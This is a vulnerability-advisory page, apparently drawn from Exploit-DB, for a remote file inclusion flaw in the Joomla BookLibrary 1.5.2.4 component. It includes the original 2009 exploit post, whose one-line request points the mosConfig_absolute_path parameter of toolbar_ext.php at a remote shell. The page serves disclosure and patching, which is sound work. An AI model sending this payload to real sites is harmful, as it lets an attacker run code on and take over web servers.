Joomla com_booklibrary_1.5.2.4 Remote File Include

vendor:

BookLibrary

by:

xoron

8,8

CVSS

HIGH

Remote File Include

CWE

Product Name: BookLibrary

Affected Version From: 1.5.2.4

Affected Version To: 1.5.2.4

Patch Exists: YES

Related CWE: N/A

CPE: a:joomla:booklibrary:1.5.2.4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Joomla com_booklibrary_1.5.2.4 Remote File Include

A vulnerability in Joomla com_booklibrary_1.5.2.4 allows an attacker to include a remote file via the mosConfig_absolute_path parameter in the toolbar_ext.php script.

Mitigation:

Upgrade to the latest version of Joomla com_booklibrary_1.5.2.4 or apply the patch provided by the vendor.

Source

Exploit-DB raw data:

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

  Joomla com_booklibrary_1.5.2.4 Remote File Include

  Download: http://ordasoft.com/Download-document/3-BookLibrary-1.5.2.4-Basic.html

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Found: xoron

contact: xorontr@gmail.com (only e-mail)

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Exploit:
          -> .../com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=shell?

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Thanx: str0ke, VoLkan

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

# milw0rm.com [2009-06-09]